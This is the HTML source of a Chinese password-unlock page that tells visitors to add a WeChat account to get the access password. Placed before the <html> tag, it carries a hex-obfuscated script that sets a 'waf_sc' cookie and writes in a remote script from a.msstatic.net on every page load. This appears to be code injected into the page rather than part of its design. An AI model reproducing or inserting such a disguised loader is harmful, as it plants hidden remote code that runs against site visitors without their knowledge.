

<script>var _0xd4d9=["\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x73\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x77\x61\x66\x5F\x73\x63","\x35\x38\x38\x39\x36\x34\x37\x37\x32\x36","\x25\x33\x43\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x2E\x6D\x73\x73\x74\x61\x74\x69\x63\x2E\x6E\x65\x74\x2F\x6D\x61\x69\x6E\x33\x2F\x63\x6F\x6D\x6D\x6F\x6E\x2F\x61\x73\x73\x65\x74\x73\x2F\x74\x65\x6D\x70\x6C\x61\x74\x65\x2F\x68\x65\x61\x64\x2F\x61\x64\x2E\x74\x6D\x70\x6C\x5F\x61\x39\x62\x37\x2E\x6A\x73\x27\x25\x33\x45\x25\x33\x43\x2F\x73\x63\x72\x69\x70\x74\x25\x33\x45","\x77\x72\x69\x74\x65"];function setc(_0x64d8x2,_0x64d8x3,_0x64d8x4){var _0x64d8x5= new Date();_0x64d8x5[_0xd4d9[1]](_0x64d8x5[_0xd4d9[0]]()+ _0x64d8x4);document[_0xd4d9[2]]= _0x64d8x2+ _0xd4d9[3]+ _0x64d8x3+ _0xd4d9[4]+ _0x64d8x5[_0xd4d9[5]]()}setc(_0xd4d9[6],_0xd4d9[7],360);document[_0xd4d9[9]](unescape(_0xd4d9[8]));</script><html>

<head>
    <title>密码访问</title>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, maximum-scale=1.0" />
    <link rel="stylesheet" type="text/css" href="https://lib.baomitu.com/twitter-bootstrap/3.1.1/css/bootstrap.min.css">
    <link rel="stylesheet" type="text/css" href="./static/css/components.min.css">
    <link rel="stylesheet" type="text/css" href="./static/css/pwd.css">
    <script type="text/javascript" src="https://lib.baomitu.com/jquery/2.0.3/jquery.min.js"></script>
    <script type="text/javascript" src="https://lib.baomitu.com/twitter-bootstrap/3.1.1/js/bootstrap.min.js"></script>
	<script type="text/javascript" src="https://app.aiyinliu.cn/static/layui/layui.js"></script>
    <script type="text/javascript" src="https://app.aiyinliu.cn/static/layui/layer/layer.js"></script>
    <style>
        section .centered.form form.live_form {
  padding: 30px 20px;
  background: #ffffff;
  border: 1px solid #e6e6e6;
  border-radius: 2px;
  -moz-border-radius: 2px;
  -webkit-border-radius: 2px;
  box-shadow: 0 5px 20px rgba(0, 0, 0, 0.1);
  border-radius: 1.4rem;

}

.btn.btn-primary {
  background: #008aff;
  padding: 1.35rem 1.75rem;
    border-radius: .75rem;
  width: 100%;

    
}

}

body {

            background-color: #eaecf3;

        }
        
        
        .form-control {
  display: block;
  width: 100%;
  height: 47px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #555;
  background-color: #fff;
  background-image: none;
  border: 1.1px solid #ccc;
  border-radius: 8px;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075);
  -webkit-transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s;
}

.container {
  margin-right: auto;
  margin-left: auto;
  padding-left: 20px;
  padding-right: 20px;
}
    </style>
    
</head>


<body id="body">
    <section>
        <div class="container">
            <div class="centered form">
                <form role="form" class="live_form" method="post" action="">
                    <h1 align="center" style=" 
                    font-size: 25px; 
                    color:#152c5b; 
                    font-weight:bold;
                     margin-bottom: 20px;
                    ">输入密码解锁此网址</h1>
                    <p align="center" style="
                    color:#7f8da0;  
                    font-size: 15px;
                    margin-bottom: 40px;
                    ">此网址的访问受到限制，请输入密码进行查看</p>
                    
                    <div class="form-group">
                        <label for="pwd">密码</label>
                        <input type="password" class="form-control" id="pwd" placeholder="请输入访问密码" name="pwd">
                    </div>
                    <button type="button" class="btn btn-primary" style=" margin-bottom: 20px;" id="btn">解锁</button>
                    <p align="center">
                      
                        由于最近封群严重 请大家加微信yjyw1234防止后期迷路 密码在朋友圈 。拿完就删的会被永久拉黑进群 <img src="file:///C:/Users/von/Desktop/%E5%9B%BE%E7%89%87/%E5%BE%AE%E5%95%86%E5%8F%B7.png" style="max-width:100%; max-height:100%;">                       
                        </p>
                </form>
            </div>
        </div>
    </section>
    


<script>
    //var $ = layui.$;
    $('#btn').click(() => {
        let pwd = $('#pwd').val();
        if (pwd.length === 0) {
            layer.msg("请输入密码");
            return;
        }
        $.ajax({
            type: 'POST',
            url: '?act=verifyPwd',
            data: {"pwd": pwd},
            timeout:60000,
            success: (data) => {
                try {
                    data = JSON.parse(data);
                } catch (e) {
                    parent.layer.msg("服务器返回数据错误！", {icon: 5});
                    console.log(e);
                    return;
                }
                let code = data.code;
                let msg = data.msg;
                if (code === 0) {
                    layer.msg("密码正确，即将跳转指定页...", {
                        time: 1000,
                        end: () => {
                            window.location.href = data.longUrl;
                        }
                    })
                } else {
                    layer.msg(msg)
                }
            },
            error: () => {
                layer.msg("服务器错误", {icon: 5})
            }
        })
    })
</script>


</body>

</html>																												
